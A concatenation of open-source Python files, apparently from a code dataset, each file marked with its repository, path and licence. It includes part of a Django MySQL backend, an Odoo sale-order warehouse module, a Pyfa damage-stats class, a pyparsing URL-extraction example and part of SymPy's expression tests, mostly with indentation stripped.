        checks need to be re-enabled.
"""
self.cursor().execute('SET foreign_key_checks=0')
return True
def enable_constraint_checking(self):
"""
Re-enable foreign key checks after they have been disabled.
"""
# Override needs_rollback in case constraint_checks_disabled is
# nested inside transaction.atomic.
self.needs_rollback, needs_rollback = False, self.needs_rollback
try:
self.cursor().execute('SET foreign_key_checks=1')
finally:
self.needs_rollback = needs_rollback
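    # Typical calling pattern for the two methods above (illustrative,
    # assuming `connection` is a DatabaseWrapper instance):
    #
    #   connection.disable_constraint_checking()
    #   try:
    #       ...  # insert rows containing forward references
    #   finally:
    #       connection.enable_constraint_checking()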
def check_constraints(self, table_names=None):
"""
Checks each table name in `table_names` for rows with invalid foreign
key references. This method is intended to be used in conjunction with
`disable_constraint_checking()` and `enable_constraint_checking()`, to
determine if rows with invalid references were entered while constraint
checks were off.
Raises an IntegrityError on the first invalid foreign key reference
encountered (if any) and provides detailed information about the
invalid reference in the error message.
Backends can override this method if they can more directly apply
constraint checking (e.g. via "SET CONSTRAINTS ALL IMMEDIATE")
"""
cursor = self.cursor()
if table_names is None:
table_names = self.introspection.table_names(cursor)
for table_name in table_names:
primary_key_column_name = self.introspection.get_primary_key_column(cursor, table_name)
if not primary_key_column_name:
continue
key_columns = self.introspection.get_key_columns(cursor, table_name)
for column_name, referenced_table_name, referenced_column_name in key_columns:
cursor.execute("""
SELECT REFERRING.`%s`, REFERRING.`%s` FROM `%s` as REFERRING
LEFT JOIN `%s` as REFERRED
ON (REFERRING.`%s` = REFERRED.`%s`)
WHERE REFERRING.`%s` IS NOT NULL AND REFERRED.`%s` IS NULL"""
% (primary_key_column_name, column_name, table_name, referenced_table_name,
column_name, referenced_column_name, column_name, referenced_column_name))
for bad_row in cursor.fetchall():
raise utils.IntegrityError("The row in table '%s' with primary key '%s' has an invalid "
"foreign key: %s.%s contains a value '%s' that does not have a corresponding value in %s.%s."
% (table_name, bad_row[0],
table_name, column_name, bad_row[1],
referenced_table_name, referenced_column_name))
def is_usable(self):
try:
self.connection.ping()
except Database.Error:
return False
else:
return True
@cached_property
def mysql_version(self):
with self.temporary_connection():
server_info = self.connection.get_server_info()
match = server_version_re.match(server_info)
if not match:
raise Exception('Unable to determine MySQL version from version string %r' % server_info)
return tuple(int(x) for x in match.groups())
| mit |
anas-taji/sale-workflow | sale_sourced_by_line/model/sale.py | 33 | 2963 | # -*- coding: utf-8 -*-
#
#
# Author: Guewen Baconnier, Yannick Vaucher
# Copyright 2013-2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from openerp import models, api, fields
from openerp.osv import orm
class SaleOrder(models.Model):
_inherit = 'sale.order'
def _prepare_order_line_procurement(self, cr, uid, order, line,
group_id=False, context=None):
values = super(SaleOrder, self)._prepare_order_line_procurement(
cr, uid, order, line, group_id=group_id, context=context)
if line.warehouse_id:
values['warehouse_id'] = line.warehouse_id.id
return values
@api.model
def _prepare_procurement_group_by_line(self, line):
vals = super(SaleOrder, self)._prepare_procurement_group_by_line(line)
# for compatibility with sale_quotation_sourcing
if line._get_procurement_group_key()[0] == 8:
if line.warehouse_id:
vals['name'] += '/' + line.warehouse_id.name
return vals
SO_STATES = {
'cancel': [('readonly', True)],
'progress': [('readonly', True)],
'manual': [('readonly', True)],
'shipping_except': [('readonly', True)],
'invoice_except': [('readonly', True)],
'done': [('readonly', True)],
}
warehouse_id = fields.Many2one(
'stock.warehouse',
'Default Warehouse',
states=SO_STATES,
help="If no source warehouse is selected on line, "
"this warehouse is used as default. ")
class SaleOrderLine(orm.Model):
_inherit = 'sale.order.line'
warehouse_id = fields.Many2one(
'stock.warehouse',
'Source Warehouse',
help="If a source warehouse is selected, "
"it will be used to define the route. "
"Otherwise, it will get the warehouse of "
"the sale order")
@api.multi
def _get_procurement_group_key(self):
""" Return a key with priority to be used to regroup lines in multiple
procurement groups
"""
priority = 8
key = super(SaleOrderLine, self)._get_procurement_group_key()
# Check priority
if key[0] >= priority:
return key
return (priority, self.warehouse_id.id)
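    # Illustrative sketch (assumption, not in the original module): keys
    # compare on their priority element first, so a parent module returning,
    # say, (10, some_id) keeps precedence over this module's
    # (8, warehouse_id):
    #
    #   key = super_key if super_key[0] >= 8 else (8, line.warehouse_id.id)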
| agpl-3.0 |
blitzmann/Pyfa | eos/utils/stats.py | 1 | 2381 | # ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
class DmgTypes:
"""Container for damage data stats."""
def __init__(self, em, thermal, kinetic, explosive):
self.em = em
self.thermal = thermal
self.kinetic = kinetic
self.explosive = explosive
self._calcTotal()
# Iterator is needed to support tuple-style unpacking
def __iter__(self):
yield self.em
yield self.thermal
yield self.kinetic
yield self.explosive
yield self.total
def __eq__(self, other):
if not isinstance(other, DmgTypes):
return NotImplemented
return all((
self.em == other.em,
self.thermal == other.thermal,
self.kinetic == other.kinetic,
self.explosive == other.explosive,
self.total == other.total))
def __bool__(self):
return any((
self.em, self.thermal, self.kinetic,
self.explosive, self.total))
def _calcTotal(self):
self.total = self.em + self.thermal + self.kinetic + self.explosive
def __add__(self, other):
return type(self)(
em=self.em + other.em,
thermal=self.thermal + other.thermal,
kinetic=self.kinetic + other.kinetic,
explosive=self.explosive + other.explosive)
def __iadd__(self, other):
self.em += other.em
self.thermal += other.thermal
self.kinetic += other.kinetic
self.explosive += other.explosive
self._calcTotal()
return self
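# Minimal usage sketch (illustrative, not part of the original module):
#
#   volley = DmgTypes(em=10.0, thermal=5.0, kinetic=0.0, explosive=2.5)
#   em, th, kin, exp_, total = volley   # tuple-style unpacking via __iter__
#   volley += DmgTypes(1.0, 1.0, 1.0, 1.0)
#   assert volley.total == 21.5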
| gpl-3.0 |
chrisdew/pyparsing-autocomplete | examples/urlExtractor.py | 16 | 1749 | # URL extractor
# Copyright 2004, Paul McGuire
from pyparsing import Literal,Suppress,CharsNotIn,CaselessLiteral,\
Word,dblQuotedString,alphanums,SkipTo
import urllib
import pprint
# Define the pyparsing grammar for a URL, that is:
# URLlink ::= <a href= URL>linkText</a>
# URL ::= doubleQuotedString | alphanumericWordPath
# Note that whitespace may appear just about anywhere in the link. Note also
# that it is not necessary to explicitly show this in the pyparsing grammar; by default,
# pyparsing skips over whitespace between tokens.
linkOpenTag = (Literal("<") + "a" + "href" + "=").suppress() + \
( dblQuotedString | Word(alphanums+"/") ) + \
Suppress(">")
linkCloseTag = Literal("<") + "/" + CaselessLiteral("a") + ">"
link = linkOpenTag + SkipTo(linkCloseTag) + linkCloseTag.suppress()
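# For example (illustrative, not in the original script), the grammar above
# matches '<a href="http://example.com">Example</a>' and yields the tokens
# ['"http://example.com"', 'Example'] (dblQuotedString keeps its quotes).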
# Go get some HTML with some links in it.
serverListPage = urllib.urlopen( "http://www.yahoo.com" )
htmlText = serverListPage.read()
serverListPage.close()
# scanString is a generator that loops through the input htmlText, and for each
# match yields the tokens and start and end locations (for this application, we are
# not interested in the start and end values).
for toks,strt,end in link.scanString(htmlText):
print toks.asList()
# Rerun scanString, but this time create a dict of text:URL key-value pairs.
# Need to reverse the tokens returned by link, using a parse action.
link.setParseAction( lambda st,loc,toks: [ toks[1], toks[0] ] )
# Create a dictionary via a list comprehension, assembled from the pair of
# tokens returned for each matched URL.
pprint.pprint(
dict( [ toks for toks,strt,end in link.scanString(htmlText) ] )
)
| mit |
lidavidm/sympy | sympy/core/tests/test_expr.py | 3 | 54640 | from __future__ import division
from sympy import (Add, Basic, S, Symbol, Wild, Float, Integer, Rational, I,
sin, cos, tan, exp, log, nan, oo, sqrt, symbols, Integral, sympify,
WildFunction, Poly, Function, Derivative, Number, pi, NumberSymbol, zoo,
Piecewise, Mul, Pow, nsimplify, ratsimp, trigsimp, radsimp, powsimp,
simplify, together, collect, factorial, apart, combsimp, factor, refine,
cancel, Tuple, default_sort_key, DiracDelta, gamma, Dummy, Sum, E,
exp_polar, Lambda, expand, diff, O)
from sympy.core.function import AppliedUndef
from sympy.physics.secondquant import FockState
from sympy.physics.units import meter
from sympy.core.compatibility import xrange
from sympy.utilities.pytest import raises, XFAIL
from sympy.abc import a, b, c, n, t, u, x, y, z
class DummyNumber(object):
"""
Minimal implementation of a number that works with SymPy.
    If one has a Number class (e.g. Sage Integer, or some other custom class)
    that one wants to work well with SymPy, one has to implement at least the
    methods of this class DummyNumber, or of its subclasses I5 and F1_1.
Basically, one just needs to implement either __int__() or __float__() and
then one needs to make sure that the class works with Python integers and
with itself.
"""
def __radd__(self, a):
if isinstance(a, (int, float)):
return a + self.number
return NotImplemented
def __truediv__(a, b):
return a.__div__(b)
def __rtruediv__(a, b):
return a.__rdiv__(b)
def __add__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number + a
return NotImplemented
def __rsub__(self, a):
if isinstance(a, (int, float)):
return a - self.number
return NotImplemented
def __sub__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number - a
return NotImplemented
def __rmul__(self, a):
if isinstance(a, (int, float)):
return a * self.number
return NotImplemented
def __mul__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number * a
return NotImplemented
def __rdiv__(self, a):
if isinstance(a, (int, float)):
return a / self.number
return NotImplemented
def __div__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number / a
return NotImplemented
def __rpow__(self, a):
if isinstance(a, (int, float)):
return a ** self.number
return NotImplemented
def __pow__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number ** a
return NotImplemented
def __pos__(self):
return self.number
def __neg__(self):
return - self.number
class I5(DummyNumber):
number = 5
def __int__(self):
return self.number
class F1_1(DummyNumber):
number = 1.1
def __float__(self):
return self.number
i5 = I5()
f1_1 = F1_1()
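# Quick pure-Python sanity check of the helpers above (illustrative):
#
#   assert i5 + 5 == 10     # I5.__add__ with a plain int
#   assert 2 * f1_1 == 2.2  # F1_1.__rmul__ with a plain int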
# basic sympy objects
basic_objs = [
Rational(2),
Float("1.3"),
x,
y,
pow(x, y)*y,
]
# all supported objects
all_objs = basic_objs + [
5,
5.5,
i5,
f1_1
]
def dotest(s):
for x in all_objs:
for y in all_objs:
s(x, y)
return True
def test_basic():
def j(a, b):
x = a
x = +a
x = -a
x = a + b
x = a - b
x = a*b
x = a/b
x = a**b
assert dotest(j)
def test_ibasic():
def s(a, b):
x = a
x += b
x = a
x -= b
x = a
x *= b
x = a
x /= b
assert dotest(s)
def test_relational():
assert (pi < 3) is False
assert (pi <= 3) is False
assert (pi > 3) is True
assert (pi >= 3) is True
assert (-pi < 3) is True
assert (-pi <= 3) is True
assert (-pi > 3) is False
assert (-pi >= 3) is False
assert (x - 2 < x - 3) is False
def test_relational_assumptions():
from sympy import Lt, Gt, Le, Ge
m1 = Symbol("m1", nonnegative=False)
m2 = Symbol("m2", positive=False)
m3 = Symbol("m3", nonpositive=False)
m4 = Symbol("m4", negative=False)
assert (m1 < 0) == Lt(m1, 0)
assert (m2 <= 0) == Le(m2, 0)
assert (m3 > 0) == Gt(m3, 0)
assert (m4 >= 0) == Ge(m4, 0)
m1 = Symbol("m1", nonnegative=False, real=True)
m2 = Symbol("m2", positive=False, real=True)
m3 = Symbol("m3", nonpositive=False, real=True)
m4 = Symbol("m4", negative=False, real=True)
assert (m1 < 0) is True
assert (m2 <= 0) is True
assert (m3 > 0) is True
assert (m4 >= 0) is True
m1 = Symbol("m1", negative=True)
m2 = Symbol("m2", nonpositive=True)
m3 = Symbol("m3", positive=True)
m4 = Symbol("m4", nonnegative=True)
assert (m1 < 0) is True
assert (m2 <= 0) is True
assert (m3 > 0) is True
assert (m4 >= 0) is True
m1 = Symbol("m1", negative=False)
m2 = Symbol("m2", nonpositive=False)
m3 = Symbol("m3", positive=False)
m4 = Symbol("m4", nonnegative=False)
assert (m1 < 0) is False
assert (m2 <= 0) is False
assert (m3 > 0) is False
assert (m4 >= 0) is False
def test_relational_noncommutative():
from sympy import Lt, Gt, Le, Ge
A, B = symbols('A,B', commutative=False)
assert (A < B) == Lt(A, B)
assert (A <= B) == Le(A, B)
assert (A > B) == Gt(A, B)
assert (A >= B) == Ge(A, B)
def test_basic_nostr():
for obj in basic_objs:
raises(TypeError, lambda: obj + '1')
raises(TypeError, lambda: obj - '1')
if obj == 2:
assert obj * '1' == '11'
else:
raises(TypeError, lambda: obj * '1')
raises(TypeError, lambda: obj / '1')
raises(TypeError, lambda: obj ** '1')
def test_series_expansion_for_uniform_order():
assert (1/x + y + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + x).series(x, 0, 1) == 1/x + y + O(x)
assert (1/x + 1 + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + 1 + x).series(x, 0, 1) == 1/x + 1 + O(x)
assert (1/x + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + y*x + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + y*x + x).series(x, 0, 1) == 1/x + y + O(x)
def test_leadterm():
assert (3 + 2*x**(log(3)/log(2) - 1)).leadterm(x) == (3, 0)
assert (1/x**2 + 1 + x + x**2).leadterm(x)[1] == -2
assert (1/x + 1 + x + x**2).leadterm(x)[1] == -1
assert (x**2 + 1/x).leadterm(x)[1] == -1
assert (1 + x**2).leadterm(x)[1] == 0
assert (x + 1).leadterm(x)[1] == 0
assert (x + x**2).leadterm(x)[1] == 1
assert (x**2).leadterm(x)[1] == 2
def test_as_leading_term():
assert (3 + 2*x**(log(3)/log(2) - 1)).as_leading_term(x) == 3
assert (1/x**2 + 1 + x + x**2).as_leading_term(x) == 1/x**2
assert (1/x + 1 + x + x**2).as_leading_term(x) == 1/x
assert (x**2 + 1/x).as_leading_term(x) == 1/x
assert (1 + x**2).as_leading_term(x) == 1
assert (x + 1).as_leading_term(x) == 1
assert (x + x**2).as_leading_term(x) == x
assert (x**2).as_leading_term(x) == x**2
assert (x + oo).as_leading_term(x) == oo
def test_leadterm2():
assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).leadterm(x) == \
(sin(1 + sin(1)), 0)
def test_leadterm3():
assert (y + z + x).leadterm(x) == (y + z, 0)
def test_as_leading_term2():
assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).as_leading_term(x) == \
sin(1 + sin(1))
def test_as_leading_term3():
assert (2 + pi + x).as_leading_term(x) == 2 + pi
assert (2*x + pi*x + x**2).as_leading_term(x) == (2 + pi)*x
def test_as_leading_term4():
# see issue 3744
n = Symbol('n', integer=True, positive=True)
r = -n**3/(2*n**2 + 4*n + 2) - n**2/(n**2 + 2*n + 1) + \
n**2/(n + 1) - n/(2*n**2 + 4*n + 2) + n/(n*x + x) + 2*n/(n + 1) - \
1 + 1/(n*x + x) + 1/(n + 1) - 1/x
assert r.as_leading_term(x).cancel() == n/2
def test_as_leading_term_stub():
class foo(Function):
pass
assert foo(1/x).as_leading_term(x) == foo(1/x)
assert foo(1).as_leading_term(x) == foo(1)
raises(NotImplementedError, lambda: foo(x).as_leading_term(x))
def test_atoms():
assert x.atoms() == set([x])
assert (1 + x).atoms() == set([x, S(1)])
assert (1 + 2*cos(x)).atoms(Symbol) == set([x])
assert (1 + 2*cos(x)).atoms(Symbol, Number) == set([S(1), S(2), x])
assert (2*(x**(y**x))).atoms() == set([S(2), x, y])
assert Rational(1, 2).atoms() == set([S.Half])
assert Rational(1, 2).atoms(Symbol) == set([])
assert sin(oo).atoms(oo) == set([oo])
assert Poly(0, x).atoms() == set([S.Zero])
assert Poly(1, x).atoms() == set([S.One])
assert Poly(x, x).atoms() == set([x])
assert Poly(x, x, y).atoms() == set([x])
assert Poly(x + y, x, y).atoms() == set([x, y])
assert Poly(x + y, x, y, z).atoms() == set([x, y])
assert Poly(x + y*t, x, y, z).atoms() == set([t, x, y])
assert (I*pi).atoms(NumberSymbol) == set([pi])
assert (I*pi).atoms(NumberSymbol, I) == \
(I*pi).atoms(I, NumberSymbol) == set([pi, I])
assert exp(exp(x)).atoms(exp) == set([exp(exp(x)), exp(x)])
assert (1 + x*(2 + y) + exp(3 + z)).atoms(Add) == \
set([1 + x*(2 + y) + exp(3 + z), 2 + y, 3 + z])
# issue 3033
f = Function('f')
e = (f(x) + sin(x) + 2)
assert e.atoms(AppliedUndef) == \
set([f(x)])
assert e.atoms(AppliedUndef, Function) == \
set([f(x), sin(x)])
assert e.atoms(Function) == \
set([f(x), sin(x)])
assert e.atoms(AppliedUndef, Number) == \
set([f(x), S(2)])
assert e.atoms(Function, Number) == \
set([S(2), sin(x), f(x)])
def test_is_polynomial():
k = Symbol('k', nonnegative=True, integer=True)
assert Rational(2).is_polynomial(x, y, z) is True
assert (S.Pi).is_polynomial(x, y, z) is True
assert x.is_polynomial(x) is True
assert x.is_polynomial(y) is True
assert (x**2).is_polynomial(x) is True
assert (x**2).is_polynomial(y) is True
assert (x**(-2)).is_polynomial(x) is False
assert (x**(-2)).is_polynomial(y) is True
assert (2**x).is_polynomial(x) is False
assert (2**x).is_polynomial(y) is True
assert (x**k).is_polynomial(x) is False
assert (x**k).is_polynomial(k) is False
assert (x**x).is_polynomial(x) is False
assert (k**k).is_polynomial(k) is False
assert (k**x).is_polynomial(k) is False
assert (x**(-k)).is_polynomial(x) is False
assert ((2*x)**k).is_polynomial(x) is False
assert (x**2 + 3*x - 8).is_polynomial(x) is True
assert (x**2 + 3*x - 8).is_polynomial(y) is True
assert (x**2 + 3*x - 8).is_polynomial() is True
assert sqrt(x).is_polynomial(x) is False
assert (sqrt(x)**3).is_polynomial(x) is False
assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(x) is True
assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(y) is False
assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial() is True
assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial() is False
assert (
(x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial(x, y) is True
assert (
(x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial(x, y) is False
def test_is_rational_function():
assert Integer(1).is_rational_function() is True
assert Integer(1).is_rational_function(x) is True
assert Rational(17, 54).is_rational_function() is True
assert Rational(17, 54).is_rational_function(x) is True
assert (12/x).is_rational_function() is True
assert (12/x).is_rational_function(x) is True
assert (x/y).is_rational_function() is True
assert (x/y).is_rational_function(x) is True
assert (x/y).is_rational_function(x, y) is True
assert (x**2 + 1/x/y).is_rational_function() is True
assert (x**2 + 1/x/y).is_rational_function(x) is True
assert (x**2 + 1/x/y).is_rational_function(x, y) is True
assert (sin(y)/x).is_rational_function() is False
assert (sin(y)/x).is_rational_function(y) is False
assert (sin(y)/x).is_rational_function(x) is True
assert (sin(y)/x).is_rational_function(x, y) is False
def test_is_algebraic_expr():
assert sqrt(3).is_algebraic_expr(x) is True
assert sqrt(3).is_algebraic_expr() is True
eq = ((1 + x**2)/(1 - y**2))**(S(1)/3)
assert eq.is_algebraic_expr(x) is True
assert eq.is_algebraic_expr(y) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(x) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(y) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr() is True
assert (cos(y)/sqrt(x)).is_algebraic_expr() is False
assert (cos(y)/sqrt(x)).is_algebraic_expr(x) is True
assert (cos(y)/sqrt(x)).is_algebraic_expr(y) is False
assert (cos(y)/sqrt(x)).is_algebraic_expr(x, y) is False
def test_SAGE1():
    # see http://code.google.com/p/sympy/issues/detail?id=247
class MyInt:
def _sympy_(self):
return Integer(5)
m = MyInt()
e = Rational(2)*m
assert e == 10
raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE2():
class MyInt(object):
def __int__(self):
return 5
assert sympify(MyInt()) == 5
e = Rational(2)*MyInt()
assert e == 10
raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE3():
class MySymbol:
def __rmul__(self, other):
return ('mys', other, self)
o = MySymbol()
e = x*o
assert e == ('mys', x, o)
def test_len():
e = x*y
assert len(e.args) == 2
e = x + y + z
assert len(e.args) == 3
def test_doit():
a = Integral(x**2, x)
assert isinstance(a.doit(), Integral) is False
assert isinstance(a.doit(integrals=True), Integral) is False
assert isinstance(a.doit(integrals=False), Integral) is True
assert (2*Integral(x, x)).doit() == x**2
def test_attribute_error():
raises(AttributeError, lambda: x.cos())
raises(AttributeError, lambda: x.sin())
raises(AttributeError, lambda: x.exp())
def test_args():
assert (x*y).args in ((x, y), (y, x))
assert (x + y).args in ((x, y), (y, x))
assert (x*y + 1).args in ((x*y, 1), (1, x*y))
assert sin(x*y).args == (x*y,)
assert sin(x*y).args[0] == x*y
assert (x**y).args == (x, y)
assert (x**y).args[0] == x
assert (x**y).args[1] == y
def test_iter_basic_args():
assert list(sin(x*y).iter_basic_args()) == [x*y]
assert list((x**y).iter_basic_args()) == [x, y]
def test_noncommutative_expand_issue658():
A, B, C = symbols('A,B,C', commutative=False)
assert A*B - B*A != 0
assert (A*(A + B)*B).expand() == A**2*B + A*B**2
assert (A*(A + B + C)*B).expand() == A**2*B + A*B**2 + A*C*B
def test_as_numer_denom():
a, b, c = symbols('a, b, c')
assert nan.as_numer_denom() == (nan, 1)
assert oo.as_numer_denom() == (oo, 1)
assert (-oo).as_numer_denom() == (-oo, 1)
assert zoo.as_numer_denom() == (zoo, 1)
assert (-zoo).as_numer_denom() == (zoo, 1)
assert x.as_numer_denom() == (x, 1)
assert (1/x).as_numer_denom() == (1, x)
assert (x/y).as_numer_denom() == (x, y)
assert (x/2).as_numer_denom() == (x, 2)
assert (x*y/z).as_numer_denom() == (x*y, z)
assert (x/(y*z)).as_numer_denom() == (x, y*z)
assert Rational(1, 2).as_numer_denom() == (1, 2)
assert (1/y**2).as_numer_denom() == (1, y**2)
assert (x/y**2).as_numer_denom() == (x, y**2)
assert ((x**2 + 1)/y).as_numer_denom() == (x**2 + 1, y)
assert (x*(y + 1)/y**7).as_numer_denom() == (x*(y + 1), y**7)
assert (x**-2).as_numer_denom() == (1, x**2)
assert (a/x + b/2/x + c/3/x).as_numer_denom() == \
(6*a + 3*b + 2*c, 6*x)
assert (a/x + b/2/x + c/3/y).as_numer_denom() == \
(2*c*x + y*(6*a + 3*b), 6*x*y)
assert (a/x + b/2/x + c/.5/x).as_numer_denom() == \
(2*a + b + 4.0*c, 2*x)
# this should take no more than a few seconds
assert int(log(Add(*[Dummy()/i/x for i in xrange(1, 705)]
).as_numer_denom()[1]/x).n(4)) == 705
for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
assert (i + x/3).as_numer_denom() == \
(x + i, 3)
assert (S.Infinity + x/3 + y/4).as_numer_denom() == \
(4*x + 3*y + S.Infinity, 12)
assert (oo*x + zoo*y).as_numer_denom() == \
(zoo*y + oo*x, 1)
A, B, C = symbols('A,B,C', commutative=False)
assert (A*B*C**-1).as_numer_denom() == (A*B*C**-1, 1)
assert (A*B*C**-1/x).as_numer_denom() == (A*B*C**-1, x)
assert (C**-1*A*B).as_numer_denom() == (C**-1*A*B, 1)
assert (C**-1*A*B/x).as_numer_denom() == (C**-1*A*B, x)
assert ((A*B*C)**-1).as_numer_denom() == ((A*B*C)**-1, 1)
assert ((A*B*C)**-1/x).as_numer_denom() == ((A*B*C)**-1, x)
def test_as_independent():
assert (2*x*sin(x) + y + x).as_independent(x) == (y, x + 2*x*sin(x))
assert (2*x*sin(x) + y + x).as_independent(y) == (x + 2*x*sin(x), y)
assert (2*x*sin(x) + y + x).as_independent(x, y) == (0, y + x + 2*x*sin(x))
assert (x*sin(x)*cos(y)).as_independent(x) == (cos(y), x*sin(x))
assert (x*sin(x)*cos(y)).as_independent(y) == (x*sin(x), cos(y))
assert (x*sin(x)*cos(y)).as_independent(x, y) == (1, x*sin(x)*cos(y))
assert (sin(x)).as_independent(x) == (1, sin(x))
assert (sin(x)).as_independent(y) == (sin(x), 1)
assert (2*sin(x)).as_independent(x) == (2, sin(x))
assert (2*sin(x)).as_independent(y) == (2*sin(x), 1)
# issue 1804 = 1766b
n1, n2, n3 = symbols('n1 n2 n3', commutative=False)
assert (n1 + n1*n2).as_independent(n2) == (n1, n1*n2)
assert (n2*n1 + n1*n2).as_independent(n2) == (0, n1*n2 + n2*n1)
assert (n1*n2*n1).as_independent(n2) == (n1, n2*n1)
assert (n1*n2*n1).as_independent(n1) == (1, n1*n2*n1)
assert (3*x).as_independent(x, as_Add=True) == (0, 3*x)
assert (3*x).as_independent(x, as_Add=False) == (3, x)
assert (3 + x).as_independent(x, as_Add=True) == (3, x)
assert (3 + x).as_independent(x, as_Add=False) == (1, 3 + x)
# issue 2380
assert (3*x).as_independent(Symbol) == (3, x)
# issue 2549
assert (n1*x*y).as_independent(x) == (n1*y, x)
assert ((x + n1)*(x - y)).as_independent(x) == (1, (x + n1)*(x - y))
assert ((x + n1)*(x - y)).as_independent(y) == (x + n1, x - y)
assert (DiracDelta(x - n1)*DiracDelta(x - y)).as_independent(x) \
== (1, DiracDelta(x - n1)*DiracDelta(x - y))
assert (x*y*n1*n2*n3).as_independent(n2) == (x*y*n1, n2*n3)
assert (x*y*n1*n2*n3).as_independent(n1) == (x*y, n1*n2*n3)
assert (x*y*n1*n2*n3).as_independent(n3) == (x*y*n1*n2, n3)
assert (DiracDelta(x - n1)*DiracDelta(y - n1)*DiracDelta(x - n2)).as_independent(y) == \
(DiracDelta(x - n1)*DiracDelta(x - n2), DiracDelta(y - n1))
# issue 2685
assert (x + Integral(x, (x, 1, 2))).as_independent(x, strict=True) == \
(Integral(x, (x, 1, 2)), x)
def test_call():
# See the long history of this in issues 1927 and 2006.
raises(TypeError, lambda: sin(x)({ x : 1, sin(x) : 2}))
raises(TypeError, lambda: sin(x)(1))
# No effect as there are no callables
assert sin(x).rcall(1) == sin(x)
assert (1 + sin(x)).rcall(1) == 1 + sin(x)
    # Effect in the presence of callables
l = Lambda(x, 2*x)
assert (l + x).rcall(y) == 2*y + x
assert (x**l).rcall(2) == x**4
# TODO UndefinedFunction does not subclass Expr
#f = Function('f')
#assert (2*f)(x) == 2*f(x)
def test_replace():
f = log(sin(x)) + tan(sin(x**2))
assert f.replace(sin, cos) == log(cos(x)) + tan(cos(x**2))
assert f.replace(
sin, lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
a = Wild('a')
b = Wild('b')
assert f.replace(sin(a), cos(a)) == log(cos(x)) + tan(cos(x**2))
assert f.replace(
sin(a), lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
# test exact
assert (2*x).replace(a*x + b, b - a, exact=True) == 2*x
assert (2*x).replace(a*x + b, b - a) == 2/x
assert (2*x).replace(a*x + b, lambda a, b: b - a, exact=True) == 2*x
assert (2*x).replace(a*x + b, lambda a, b: b - a) == 2/x
g = 2*sin(x**3)
assert g.replace(
lambda expr: expr.is_Number, lambda expr: expr**2) == 4*sin(x**9)
assert cos(x).replace(cos, sin, map=True) == (sin(x), {cos(x): sin(x)})
assert sin(x).replace(cos, sin) == sin(x)
cond, func = lambda x: x.is_Mul, lambda x: 2*x
assert (x*y).replace(cond, func, map=True) == (2*x*y, {x*y: 2*x*y})
assert (x*(1 + x*y)).replace(cond, func, map=True) == \
(2*x*(2*x*y + 1), {x*(2*x*y + 1): 2*x*(2*x*y + 1), x*y: 2*x*y})
assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y, map=True) == \
(sin(x), {sin(x): sin(x)/y})
# if not simultaneous then y*sin(x) -> y*sin(x)/y = sin(x) -> sin(x)/y
assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y,
simultaneous=False) == sin(x)/y
assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e) == O(1, x)
assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e,
simultaneous=False) == x**2/2 + O(x**3)
assert (x*(x*y + 3)).replace(lambda x: x.is_Mul, lambda x: 2 + x) == \
x*(x*y + 5) + 2
e = (x*y + 1)*(2*x*y + 1) + 1
assert e.replace(cond, func, map=True) == (
2*((2*x*y + 1)*(4*x*y + 1)) + 1,
{2*x*y: 4*x*y, x*y: 2*x*y, (2*x*y + 1)*(4*x*y + 1):
2*((2*x*y + 1)*(4*x*y + 1))})
assert x.replace(x, y) == y
assert (x + 1).replace(1, 2) == x + 2
def test_find():
expr = (x + y + 2 + sin(3*x))
assert expr.find(lambda u: u.is_Integer) == set([S(2), S(3)])
assert expr.find(lambda u: u.is_Symbol) == set([x, y])
assert expr.find(lambda u: u.is_Integer, group=True) == {S(2): 1, S(3): 1}
assert expr.find(lambda u: u.is_Symbol, group=True) == {x: 2, y: 1}
assert expr.find(Integer) == set([S(2), S(3)])
assert expr.find(Symbol) == set([x, y])
assert expr.find(Integer, group=True) == {S(2): 1, S(3): 1}
assert expr.find(Symbol, group=True) == {x: 2, y: 1}
a = Wild('a')
expr = sin(sin(x)) + sin(x) + cos(x) + x
